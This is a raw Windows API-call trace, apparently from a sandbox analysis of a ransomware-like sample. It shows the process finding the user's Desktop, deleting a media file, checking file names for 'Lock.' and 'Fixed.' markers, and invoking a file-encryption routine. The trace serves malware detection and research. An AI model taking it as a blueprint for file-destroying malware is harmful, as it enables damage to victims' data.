[0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0189.328] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.329] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0189.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0189.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0189.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0189.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0189.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0189.341] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0189.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0189.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0189.341] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0189.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0189.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0189.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0189.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0189.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0189.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0189.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0189.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0189.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0189.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0189.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0189.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0189.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0189.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0189.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0189.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0189.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5a) returned 0x2e563a8 [0189.342] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/mfyUopWTtUAprVK7.mp3", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\mfyUopWTtUAprVK7.mp3", lpFilePart=0x8cedf4*="mfyUopWTtUAprVK7.mp3") returned 0x2c [0189.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0189.342] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mfyUopWTtUAprVK7.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\mfyuopwttuaprvk7.mp3")) returned 0x20 [0189.342] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\mfyUopWTtUAprVK7.mp3", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ab0b4c0, ftCreationTime.dwHighDateTime=0x1d5e4cf, ftLastAccessTime.dwLowDateTime=0x78d6c600, ftLastAccessTime.dwHighDateTime=0x1d5ea8c, ftLastWriteTime.dwLowDateTime=0x78d6c600, ftLastWriteTime.dwHighDateTime=0x1d5ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x11777, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="mfyUopWTtUAprVK7.mp3", cAlternateFileName="MFYUOP~1.MP3")) returned 0xa87050 [0189.343] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mfyUopWTtUAprVK7.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\mfyuopwttuaprvk7.mp3")) returned 1 [0189.449] FindNextFileW (in: hFindFile=0xa87050, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ab0b4c0, ftCreationTime.dwHighDateTime=0x1d5e4cf, ftLastAccessTime.dwLowDateTime=0x78d6c600, ftLastAccessTime.dwHighDateTime=0x1d5ea8c, ftLastWriteTime.dwLowDateTime=0x78d6c600, ftLastWriteTime.dwHighDateTime=0x1d5ea8c, nFileSizeHigh=0x0, nFileSizeLow=0x11777, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="mfyUopWTtUAprVK7.mp3", cAlternateFileName="MFYUOP~1.MP3")) returned 0 [0189.449] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0189.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0189.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0189.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0189.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0189.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0189.450] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0189.450] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0189.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0189.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0189.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0189.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0189.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0189.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0189.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.450] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0189.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0189.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0189.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5a) returned 0x2e563a8 [0189.451] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/mfyUopWTtUAprVK7.mp3", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\mfyUopWTtUAprVK7.mp3", lpFilePart=0x8cf650*="mfyUopWTtUAprVK7.mp3") returned 0x2c [0189.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0189.451] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\mfyUopWTtUAprVK7.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\mfyuopwttuaprvk7.mp3")) returned 0xffffffff [0189.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0189.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0189.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0189.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0189.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0189.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0189.451] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0189.451] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.451] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0189.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0189.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0189.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0189.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0189.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0189.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0189.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0189.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0189.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0189.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0189.452] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0189.452] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mpe9Fe1_ci-oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pe9Fe1_ci-oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e9Fe1_ci-oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Fe1_ci-oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fe1_ci-oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1_ci-oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1_ci-oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_ci-oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ci-oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i-oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oIpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IpS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0189.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pS.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S.flv", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0189.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0189.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0189.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0189.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0189.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0189.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0189.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0189.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0189.453] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0189.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0189.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0189.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0189.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0189.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0189.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0189.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0189.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0189.453] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0189.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0189.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0189.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0189.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0189.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0189.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0189.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0189.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x28) returned 0x9778d8 [0189.454] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mpe9Fe1_ci-oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pe9Fe1_ci-oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e9Fe1_ci-oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9Fe1_ci-oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Fe1_ci-oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e1_ci-oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1_ci-oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_ci-oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ci-oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i-oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oIpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IpS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pS.flv", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0189.454] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0189.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0189.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0189.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0189.455] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0189.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0189.455] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0189.455] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0189.455] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0189.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b28 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0189.456] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0189.456] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0189.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0189.456] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0189.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0189.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0189.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0189.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0189.471] HeapFree (in: hHeap=0x970000, 